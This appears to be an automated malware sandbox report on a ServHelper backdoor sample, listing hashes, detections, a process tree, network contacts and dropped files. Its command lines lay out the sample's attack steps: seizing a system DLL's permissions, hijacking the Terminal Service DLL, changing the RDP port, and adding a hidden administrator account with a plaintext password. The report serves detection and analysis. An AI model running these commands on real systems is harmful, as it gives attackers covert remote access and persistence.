Analysis

  • max time kernel
    142s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03-05-2022 19:24

General

  • Target

    4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe

  • Size

    3.2MB

  • MD5

    337e4fd5e423ee5e716ed7ee270bcd00

  • SHA1

    6390cf1f9b5a7e5dc3494d603c634e8b5c9b6233

  • SHA256

    4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398

  • SHA512

    e44814ffdfda11c7f2461b3ec8fa587bf2ca28b8f48b28a9bf103d5a3faf3e5293995c88e8e625eb71f856b5e5160f52ef011a5decd3acd4b1029aa63591e724

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe
    "C:\Users\Admin\AppData\Local\Temp\4bd7686dfdc21d3763deecc2bb8a238eb1848fe8328411aabded29d08a529398.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB693.tmp" "c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP"
          4⤵
          PID:1500
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4752
      • C:\Windows\system32\takeown.exe
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:964
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2952
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3576
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4984
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4160
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4332
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4248
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2444
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        3⤵
        PID:2868
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        3⤵
        • Modifies registry key
        PID:4440
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        3⤵
        PID:2392
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3664
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          4⤵
          PID:4816
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4972
        • C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Windows\system32\net.exe
            net start rdpdr
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start rdpdr
              6⤵
              PID:1608
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1848
        • C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4580
          • C:\Windows\system32\net.exe
            net start TermService
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1016
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService
              6⤵
              PID:5056
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        3⤵
        PID:1616
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        3⤵
        PID:2824
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc 000000 /del
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3708
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc 000000 /del
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
        3⤵
        PID:2488
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc pd21abwo /add
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc pd21abwo /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc pd21abwo /add
        3⤵
        PID:1712
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    1⤵
    PID:3952
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      2⤵
      PID:4952
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        3⤵
        PID:3316
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
    1⤵
    PID:5060
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
      2⤵
      PID:204
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
        3⤵
        PID:872
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    1⤵
    PID:3040
    • C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      2⤵
      PID:3248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
        3⤵
        PID:1384
  • C:\Windows\System32\cmd.exe
    cmd /C net.exe user WgaUtilAcc pd21abwo
    1⤵
    PID:3264
    • C:\Windows\system32\net.exe
      net.exe user WgaUtilAcc pd21abwo
      2⤵
      PID:4008
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user WgaUtilAcc pd21abwo
        3⤵
        PID:2516

Network

  • DNS 96.108.152.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 96.108.152.52.in-addr.arpa IN PTR
    Response: (none)
  • DNS petrovich.xyz
    Remote address: 8.8.8.8:53
    Request: petrovich.xyz IN A
    Response: petrovich.xyz IN A 188.114.97.0
    Response: petrovich.xyz IN A 188.114.96.0
  • 88.221.144.179:80
    322 B
    7
  • 88.221.144.179:80
    322 B
    7
  • 13.89.178.26:443
    322 B
    7
  • 188.114.97.0:443
    petrovich.xyz
    tls, https
    1.5kB
    6.2kB
    15
    17
  • 67.26.203.254:80
    46 B
    40 B
    1
    1
  • 8.8.8.8:53
    96.108.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1
    DNS Request: 96.108.152.52.in-addr.arpa
  • 8.8.8.8:53
    petrovich.xyz
    dns
    59 B
    91 B
    1
    1
    DNS Request: petrovich.xyz
    DNS Response: 188.114.97.0, 188.114.96.0

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize 54KB
    MD5 5f612d9087b8bcadb4002e6b026990e8
    SHA1 b5f343e569abb0849c06e3d77d00cc1bd2d5f589
    SHA256 838be164025509d2c4dd005aabf7bbca522b703e931d9c21fb287b5f06178450
    SHA512 d5e3e0eeb9b4d3f7ceeba19bc83669258d77d6f973e90049d8cb2796e3f0f6502209e1863ba0a0c7d69b1cc3c0a43e74b9efd0557854ac349f3ffc51d6ea1c59

  • C:\Users\Admin\AppData\Local\Temp\RESB693.tmp
    Filesize 1KB
    MD5 c439285bbde55b677c096447745ccd29
    SHA1 ffec0b5e55ed349b6b9938a8e4a04767d50c3ff1
    SHA256 c674812c663d4cdf0e8e0d18dc54f291079d206332a96a857512ccaa71330061
    SHA512 be41a39cf6507d4684f0243262ba98893b8eadde92363fadb82cd3a63a04ef443c0e4e0c4caf7f55ab9560d7dfc672d8172f79fdbe17a686d82ba85cf77c2f87

  • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    Filesize 3.0MB
    MD5 031d92d079edd02c5f34248e9bf03ff6
    SHA1 736e40d6cde2566fb5d976cb1d7172e6acb8bd12
    SHA256 ab89298954e80cea1c73937cb628874832ab9d45c6d3be9dde40c4a4aae82ad2
    SHA512 5bf6934556f451d35303e50e03b5a74a4b74d58b836f15c3cc3356b0b9e1a2bff6867153c63537f5fc942d346850bc9d2a34cf509d6c5b4d13d9021eefce39f5

  • C:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.dll
    Filesize 3KB
    MD5 cb9e39baafea02d62d0c9252a81e8e7c
    SHA1 ce60b8f72ed39b8b78af22be04cbbe7ff5b85d77
    SHA256 251c5247ede2f35abe3c3ff497a0a2dd8a4081371ceefa28120556722e9009b2
    SHA512 5c9eba6ae4c8a559fe72a48329d49fa057926f28be5737cab07b2a0524c035975d518cc294d14809ddc9ef3f3484f4233f9388b63ea127edd82e9ef48c986db3

  • C:\Windows\Branding\mediasrv.png
    Filesize 54KB
    MD5 40bf8ddb2544e110ff0f368fdb0f34ba
    SHA1 a9a0ed994500563a1b45b7748d76ab522d9f870f
    SHA256 21bebaf9f55e1288bea72cf10645536d3b62599973cb48adb3f4d3c9e0d450a7
    SHA512 8e3583b868d3a9ac1f992dfa555fe2ab60934ff76e35c751b8e8ca13d94ded40e02f47ff9074c19fea48bf68a02e21fef87c0b75a385aae53d41184b475e7ac5

  • C:\Windows\Branding\mediasvc.png
    Filesize 944KB
    MD5 dc99adf951d836bbac2b6e729555c3b7
    SHA1 f3c6f96a3ae48e4048771bc070f427c0d7353d60
    SHA256 0157d803e2b1b8a43236d08aa8f8f80d3afd629d822bb901fb712192e7aa90be
    SHA512 3eff38448e3a5b9328643e1f96873c126b470ec4d576f5504f8c1abe1bf6800b662cd97d12979cdffdca13e9410a01a5390a2dd0f27b9c9a0c083d953690955f

  • C:\Windows\system32\rfxvmt.dll
    Filesize 40KB
    MD5 dc39d23e4c0e681fad7a3e1342a2843c
    SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
    SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
    SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

  • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\CSC23AAE9E7F60A486E9411445B2152B32A.TMP
    Filesize 652B
    MD5 bf64c714dc1375e66b9e64e2b54cd4c5
    SHA1 579f954358037eb68c91dcaafcf2ef394d11d04d
    SHA256 d8ae1460c1acea4ba0ad40432d81119004e7e2ad4d7d035e696d6a41a522fb23
    SHA512 abecf88ab8fdd7bfc115b277260d554a011594bb62078d919501118b48f7ee5b5ce8a48963f4aebe00db84a0f1488176594d502010ce94cdcd9d10c9dbe86a77

  • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.0.cs
    Filesize 504B
    MD5 8e55cb0ca998472ab6d3e295e0c4dd50
    SHA1 407d07a29b89fc3afc246c0680d5857e3f51019d
    SHA256 63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
    SHA512 c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

  • \??\c:\Users\Admin\AppData\Local\Temp\lvlowopo\lvlowopo.cmdline
    Filesize 369B
    MD5 12524ccc3bc37bbe35e7b5963d148cfa
    SHA1 6a7b17fd989b22ad6b88607f03ed0b8e86e77439
    SHA256 59b6b333ee73158564f2df7b5b493623930ef1f2affd9e50afcb60d9db6ab722
    SHA512 8357b5f82c51d908986db8b1a5e2b6e0c782c2ec3848856183d706336ba0e2e8fc7458410febc195de464a32d76d4042132ae8706a59aa69abed8d65ba82944f

  • memory/3916-134-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp
    Filesize 10.8MB

  • memory/3916-132-0x000002BE55880000-0x000002BE558C4000-memory.dmp
    Filesize 272KB

  • memory/3916-142-0x000002BE5DEB0000-0x000002BE5E026000-memory.dmp
    Filesize 1.5MB

  • memory/3916-184-0x000002BE55CE0000-0x000002BE55D56000-memory.dmp
    Filesize 472KB

  • memory/3916-143-0x000002BE5E240000-0x000002BE5E44A000-memory.dmp
    Filesize 2.0MB

  • memory/3916-131-0x000002BE54390000-0x000002BE543B2000-memory.dmp
    Filesize 136KB

  • memory/4200-145-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp
    Filesize 10.8MB

  • memory/4752-149-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp
    Filesize 10.8MB

  • memory/5032-148-0x00007FFAB72A0000-0x00007FFAB7D61000-memory.dmp
    Filesize 10.8MB
